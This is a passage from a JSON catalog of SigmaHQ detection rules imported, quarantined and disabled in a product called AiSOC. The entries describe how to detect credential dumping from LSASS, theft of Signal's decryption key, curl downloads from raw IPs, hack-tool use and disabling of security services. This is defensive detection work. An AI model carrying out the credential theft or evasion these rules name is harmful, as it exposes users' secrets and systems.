"source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rundll32-execution-without-parameters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5bb68627-3198-40ca-b458-49f973db8752", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_without_parameters.yml" } }, { "id": "sigmahq-sigma-5bed80b6-b3e8-428e-a3ae-d3c757589e41", "type": "detection", "name": "RDP over Reverse SSH Tunnel WFP", "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090.001", "T1090.002", "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rdp-over-reverse-ssh-tunnel-wfp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_rdp_reverse_tunnel.yml" } }, { "id": "sigmahq-sigma-5c80b618-0dbb-46e6-acbb-03d90bcb6d83", "type": "detection", "name": "Network Connection Initiated To AzureWebsites.NET By Non-Browser Process", "description": "Detects an initiated network connection by a non browser process on the system to \"azurewebsites.net\". 
The latter was often used by threat actors as a malware hosting and exfiltration site.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1102", "T1102.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-connection-initiated-to-azurewebsites-net-by-non-browser-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5c80b618-0dbb-46e6-acbb-03d90bcb6d83", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_azurewebsites.yml" } }, { "id": "sigmahq-sigma-5c82f0b9-3c6d-477f-a318-0e14a1df73e0", "type": "detection", "name": "Okta Security Threat Detected", "description": "Detects when a security threat is detected in Okta.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-security-threat-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5c82f0b9-3c6d-477f-a318-0e14a1df73e0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_security_threat_detected.yml" } }, { "id": "sigmahq-sigma-5c84856b-55a5-45f1-826f-13f37250cf4e", "type":
"detection", "name": "Malware User Agent", "description": "Detects suspicious user agent strings used by malware in proxy logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malware-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5c84856b-55a5-45f1-826f-13f37250cf4e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_ua_malware.yml" } }, { "id": "sigmahq-sigma-5c8d7b41-3812-432f-a0bb-4cfb7c31827e", "type": "detection", "name": "FortiGate - Firewall Address Object Added", "description": "Detects the addition of firewall address objects on a Fortinet FortiGate Firewall.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/fortigate-firewall-address-object-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5c8d7b41-3812-432f-a0bb-4cfb7c31827e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/fortinet/fortigate/fortinet_fortigate_new_firewall_address_object.yml" } }, { "id": 
"sigmahq-sigma-5cb299fc-5fb1-4d07-b989-0644c68b6043", "type": "detection", "name": "Suspicious File Download From IP Via Curl.EXE", "description": "Detects potentially suspicious file downloads directly from IP addresses using curl.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-download-from-ip-via-curl-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5cb299fc-5fb1-4d07-b989-0644c68b6043", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml" } }, { "id": "sigmahq-sigma-5cc2cda8-f261-4d88-a2de-e9e193c86716", "type": "detection", "name": "Suspicious Processes Spawned by WinRM", "description": "Detects suspicious processes including shells spawned from the WinRM host process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-processes-spawned-by-winrm.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": 
"2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_winrm_susp_child_process.yml" } }, { "id": "sigmahq-sigma-5cc90652-4cbd-4241-aa3b-4b462fa5a248", "type": "detection", "name": "Potential Recon Activity Via Nltest.EXE", "description": "Detects nltest commands that can be used for information discovery", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1016", "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-recon-activity-via-nltest-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_nltest_recon.yml" } }, { "id": "sigmahq-sigma-5cdb711b-5740-4fb2-ba88-f7945027afac", "type": "detection", "name": "Rundll32 UNC Path Execution", "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rundll32-unc-path-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5cdb711b-5740-4fb2-ba88-f7945027afac", "source_commit": "df5c6a6", "license": "DRL-1.1", 
"license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_unc_path.yml" } }, { "id": "sigmahq-sigma-5cddf373-ef00-4112-ad72-960ac29bac34", "type": "detection", "name": "HackTool - Koadic Execution", "description": "Detects command line parameters used by Koadic hack tool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.003", "T1059.005", "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-koadic-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5cddf373-ef00-4112-ad72-960ac29bac34", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_koadic.yml" } }, { "id": "sigmahq-sigma-5cdeaf3d-1489-477c-95ab-c318559fc051", "type": "detection", "name": "AppX Located in Known Staging Directory Added to Deployment Pipeline", "description": "Detects an appx package that was added to the pipeline of the \"to be processed\" packages that is located in a known folder often used as a staging directory.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/appx-located-in-known-staging-directory-added-to-deployment-pipeline.yaml", "quarantine_reason": "imported rule; upstream query language not 
directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5cdeaf3d-1489-477c-95ab-c318559fc051", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_appx_package_in_staging_directory.yml" } }, { "id": "sigmahq-sigma-5ce0f04e-3efc-42af-839d-5b3a543b76c0", "type": "detection", "name": "Suspicious Process Execution From Fake Recycle.Bin Folder", "description": "Detects process execution from a fake recycle bin folder, often used to evade security solutions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-process-execution-from-fake-recycle-bin-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5ce0f04e-3efc-42af-839d-5b3a543b76c0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml" } }, { "id": "sigmahq-sigma-5d0fdb62-f225-42fb-8402-3dfe64da468a", "type": "detection", "name": "User Added To Admin Group Via DseditGroup", "description": "Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.003" ], "log_source": null, "playbook": null, "verified": false, 
"source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-added-to-admin-group-via-dseditgroup.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5d0fdb62-f225-42fb-8402-3dfe64da468a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_dseditgroup_add_to_admin_group.yml" } }, { "id": "sigmahq-sigma-5d19eb78-5b5b-4ef2-a9f0-4bfa94d58a13", "type": "detection", "name": "Remote Access Tool - ScreenConnect File Transfer", "description": "Detects file being transferred via ScreenConnect RMM", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-screenconnect-file-transfer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5d19eb78-5b5b-4ef2-a9f0-4bfa94d58a13", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_file_transfer.yml" } }, { "id": "sigmahq-sigma-5d6c375a-18ae-4952-b4f6-8b803f6c8555", "type": "detection", "name": "File Access Of Signal Desktop Sensitive Data", "description": "Detects access to Signal Desktop's sensitive data files: db.sqlite and config.json.\nThe db.sqlite file in Signal Desktop stores all locally saved messages 
in an encrypted SQLite database, while the config.json contains the decryption key needed to access that data.\nSince the key is stored in plain text, a threat actor who gains access to both files can decrypt and read sensitive messages without needing the user's credentials.\nCurrently the rule only covers the default Signal installation path in AppData\\Roaming. Signal Portable installations may use different paths based on user configuration. Additional paths can be added to the selection as needed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-access-of-signal-desktop-sensitive-data.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5d6c375a-18ae-4952-b4f6-8b803f6c8555", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_signal_sensitive_config_access.yml" } }, { "id": "sigmahq-sigma-5d756aee-ad3e-4306-ad95-cb1abec48de2", "type": "detection", "name": "GoToAssist Temporary Installation Artefact", "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by 
adversaries. (Citation: Symantec Living off the Land)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/gotoassist-temporary-installation-artefact.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5d756aee-ad3e-4306-ad95-cb1abec48de2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_gotoopener_artefact.yml" } }, { "id": "sigmahq-sigma-5daf11c3-022b-4969-adb9-365e6c078c7c", "type": "detection", "name": "CodeIntegrity - Disallowed File For Protected Processes Has Been Blocked", "description": "Detects block events for files that are disallowed by code integrity for protected processes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/codeintegrity-disallowed-file-for-protected-processes-has-been-blocked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5daf11c3-022b-4969-adb9-365e6c078c7c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/builtin/code_integrity/win_codeintegrity_blocked_protected_process_file.yml" } }, { "id": "sigmahq-sigma-5de03871-5d46-4539-a82d-3aa992a69a83", "type": "detection", "name": "Registry Disable System Restore", "description": "Detects the modification of the registry to disable a system restore on the computer", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-disable-system-restore.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5de03871-5d46-4539-a82d-3aa992a69a83", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disable_system_restore.yml" } }, { "id": "sigmahq-sigma-5de06a6f-673a-4fc0-8d48-bcfe3837b033", "type": "detection", "name": "System Information Discovery Using sw_vers", "description": "Detects the use of \"sw_vers\" for system information discovery", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-information-discovery-using-sw-vers.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5de06a6f-673a-4fc0-8d48-bcfe3837b033", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_swvers_discovery.yml" } }, { "id": "sigmahq-sigma-5df86130-4e95-4a54-90f7-26541b40aec2", "type": "detection", "name": "Registry Modification to Hidden File Extension", "description": "Hides the file extension through modification of the registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1137" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-modification-to-hidden-file-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5df86130-4e95-4a54-90f7-26541b40aec2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_hidden_extention.yml" } }, { "id": "sigmahq-sigma-5dfc1465-8f65-4fde-8eb5-6194380c6a62", "type": "detection", "name": "Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted", "description": "Detects the enabling of the Windows Recall feature via registry manipulation. 
Windows Recall can be enabled by deleting the existing \"DisableAIDataAnalysis\" registry value.\nAdversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.\nThis rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1113" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-recall-feature-enabled-disableaidataanalysis-value-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5dfc1465-8f65-4fde-8eb5-6194380c6a62", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_delete/registry_delete_enable_windows_recall.yml" } }, { "id": "sigmahq-sigma-5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", "type": "detection", "name": "Suspicious Invoke-WebRequest Execution", "description": "Detects a suspicious call to the Invoke-WebRequest cmdlet where the output is written to a suspicious location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-invoke-webrequest-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml" } }, { "id": "sigmahq-sigma-5e51acb2-bcbe-435b-99c6-0e3cd5e2aa59", "type": "detection", "name": "Cisco Stage Data", "description": "Various protocols may be used to put data on the device for exfiltration or infiltration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1074", "T1105", "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-stage-data.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5e51acb2-bcbe-435b-99c6-0e3cd5e2aa59", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/aaa/cisco_cli_moving_data.yml" } }, { "id": "sigmahq-sigma-5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", "type": "detection", "name": "Suspicious Parent Double Extension File Execution", "description": "Detects execution of suspicious double extension files in ParentCommandLine", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-parent-double-extension-file-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the 
AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_double_extension_parent.yml" } }, { "id": "sigmahq-sigma-5e95028c-5229-4214-afae-d653d573d0ec", "type": "detection", "name": "Security Service Disabled Via Reg.EXE", "description": "Detects execution of \"reg.exe\" to disable security services such as Windows Defender.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/security-service-disabled-via-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5e95028c-5229-4214-afae-d653d573d0ec", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_disable_sec_services.yml" } }, { "id": "sigmahq-sigma-5e993621-67d4-488a-b9ae-b420d08b96cb", "type": "detection", "name": "Service Installation in Suspicious Folder", "description": "Detects service installation in suspicious folder appdata", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/service-installation-in-suspicious-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5e993621-67d4-488a-b9ae-b420d08b96cb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_susp_service_installation_folder.yml" } }, { "id": "sigmahq-sigma-5edc2273-c26f-406c-83f3-f4d948e740dd", "type": "detection", "name": "Indirect Inline Command Execution Via Bash.EXE", "description": "Detects execution of Microsoft bash launcher with the \"-c\" flag.\nThis can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/indirect-inline-command-execution-via-bash-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5edc2273-c26f-406c-83f3-f4d948e740dd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_bash_command_execution.yml" } }, { "id": "sigmahq-sigma-5ee3a654-372f-11ec-8d3d-0242ac130003", "type": "detection", "name": "ADCS Certificate Template Configuration Vulnerability", "description": "Detects certificate creation with template allowing risk permission subject", "version": "1.0.0", 
"author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/adcs-certificate-template-configuration-vulnerability.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5ee3a654-372f-11ec-8d3d-0242ac130003", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability.yml" } }, { "id": "sigmahq-sigma-5ef9853e-4d0e-4a70-846f-a9ca37d876da", "type": "detection", "name": "Potential Credential Dumping Activity Via LSASS", "description": "Detects process access requests to the LSASS process with specific call trace calls and access masks.\nThis behaviour is expressed by many credential dumping tools such as Mimikatz, NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-credential-dumping-activity-via-lsass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_access/proc_access_win_lsass_memdump.yml" } }, { "id": "sigmahq-sigma-5f03babb-12db-4eec-8c82-7b4cb5580868", "type": "detection", "name": "Response File Execution Via Odbcconf.EXE", "description": "Detects execution of \"odbcconf\" with the \"-f\" flag in order to load a response file which might contain a malicious action.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/response-file-execution-via-odbcconf-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5f03babb-12db-4eec-8c82-7b4cb5580868", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml" } }, { "id": 